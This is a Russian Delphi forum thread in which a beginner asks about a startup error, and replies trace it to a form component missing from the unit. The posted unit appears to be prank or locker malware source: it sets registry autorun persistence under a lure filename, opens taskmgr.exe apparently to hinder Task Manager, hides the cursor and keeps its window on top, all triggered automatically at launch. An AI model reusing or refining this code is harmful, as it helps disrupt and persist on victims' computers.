Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 02.09.2010, 18:28   #1
dan582107
 
Регистрация: 30.08.2010
Сообщений: 8
По умолчанию Что за ошибка?

Пишу на Delphi 7
После нажатия F9 (выполнить) выходит такая ошибка:


После "оК"



Подскажите что делать.
А то я Нуб.
Заранее Спасибо
dan582107 вне форума Ответить с цитированием
Старый 02.09.2010, 18:33   #2
DIgorevich
Погулять вышел
Участник клуба
 
Аватар для DIgorevich
 
Регистрация: 17.05.2010
Сообщений: 1,573
По умолчанию

Покажи код Unit1
Никогда не знаешь, где тебе повезет... (Фрай)
DIgorevich вне форума Ответить с цитированием
Старый 02.09.2010, 18:39   #3
dan582107
 
Регистрация: 30.08.2010
Сообщений: 8
По умолчанию

Цитата:
Сообщение от DIgorevich Посмотреть сообщение
Покажи код Unit1
Код:
unit Unit1;

interface

uses
  Windows, Registry, Controls, StdCtrls, Messages, SysUtils, Variants, Classes, Graphics,  Forms,
  Dialogs, ExtCtrls, jpeg;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    Timer1: TTimer;
    Button3: TButton;
    Timer2: TTimer;
    StaticText1: TStaticText;
    StaticText2: TStaticText;
    StaticText3: TStaticText;
    StaticText4: TStaticText;
    StaticText5: TStaticText;
    StaticText6: TStaticText;
    StaticText7: TStaticText;
    StaticText8: TStaticText;
    Image1: TImage;
    Label1: TLabel;
    Button4: TButton;
    StaticText9: TStaticText;
    StaticText10: TStaticText;
    StaticText11: TStaticText;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure Button3Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure Timer2Timer(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
Var
RegIni:TregIniFile;   
Begin
RegIni:=TregIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion',True);
RegIni.WriteString('Run','Прочитай.exe',Application.ExeName);   
RegIni.Free;
end;

procedure TForm1.Button2Click(Sender: TObject);
var FS: TFileStream;
begin
  FS:=TFileStream.Create('c:\windows\system32\taskmgr.exe', fmOpenRead, fmShareDenyNone);
end;

Procedure TForm1.Timer1Timer(Sender: TObject);
Begin
SetWindowPos(Handle,HWND_TOPMOST,Left,Top,Width,Height,SWP_NOACTIVATE Or SWP_NOMOVE Or SWP_NOSIZE);
End;


procedure TForm1.Button3Click(Sender: TObject);
var
  CState: Integer;
begin
  CState := ShowCursor(True);
  while Cstate >= 0 do
    Cstate := ShowCursor(False);
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
timer2.Enabled:=true;
end;

procedure TForm1.Timer2Timer(Sender: TObject);
begin
button1.Click;
button2.Click;
button3.Click;
timer1.Enabled:=false;
end;
end.
dan582107 вне форума Ответить с цитированием
Старый 02.09.2010, 18:41   #4
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

похоже dfm файл испортили...
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 02.09.2010, 18:43   #5
DIgorevich
Погулять вышел
Участник клуба
 
Аватар для DIgorevich
 
Регистрация: 17.05.2010
Сообщений: 1,573
По умолчанию

Судя по ошибке, у тебя на форме компонент Edit присутствует, а в модуле его нет. Если это так, то удали компонент, и снова закинь на форму с палитры. Если его нет, то поставь.
Никогда не знаешь, где тебе повезет... (Фрай)
DIgorevich вне форума Ответить с цитированием
Старый 02.09.2010, 19:44   #6
dan582107
 
Регистрация: 30.08.2010
Сообщений: 8
По умолчанию

Цитата:
Сообщение от DIgorevich Посмотреть сообщение
Судя по ошибке, у тебя на форме компонент Edit присутствует, а в модуле его нет. Если это так, то удали компонент, и снова закинь на форму с палитры. Если его нет, то поставь.
СПС Помогло
dan582107 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Что за ошибка ? DenProx БД в Delphi 4 17.12.2009 10:45
Ошибка в Аfor i:=1 to SI do. Пишит что ошибка в SI Алексей_xXx Помощь студентам 2 29.05.2009 00:09
что за ошибка? Askar_g Помощь студентам 1 13.01.2009 12:20
Что за ошибка... Alexij БД в Delphi 1 17.04.2008 23:17
Что за ошибка??? Rembo Свободное общение 2 08.01.2008 14:34